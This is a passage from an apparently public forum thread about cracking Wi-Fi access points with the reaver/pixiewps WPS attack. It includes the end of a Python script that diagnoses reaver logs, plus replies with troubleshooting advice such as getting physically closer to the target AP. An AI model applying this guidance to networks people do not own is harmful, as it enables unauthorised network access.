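        return "exchange stops after M2: no M3, so E-Hash1/E-Hash2 are never exposed (AP rejects or rate-limits the registrar)"
    return "M3 received: the AP exposes the M1-M3 material pixiewps consumes"


if __name__ == "__main__":
    s = parse_reaver_log(REAVER_LOG)
    print(s["attempts"], "attempts, highest stage", highest_stage(s), dict(s["failure_codes"]))
    print(diagnose(s))
```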
-
It looks like the routers you're attempting reaver with are patched (becoming more and more common); you may need to be closer to the AP. This would also happen on some APs where I wasn't able to get all the messages that pixiewps needs. Usually when I got closer I started getting more of the messages. However, my router will just not reply with any messages when using reaver.
Try a different area of routers, may have better luck
-
Thanks Deep, probably you haven't seen that I've posted two replies; reply #15 is on the 2nd page and reply #14 is on the 1st page. In reply #14 I'm trying to crack another AP where I placed myself at 20 cm of distance from it, but with no results... :'(
-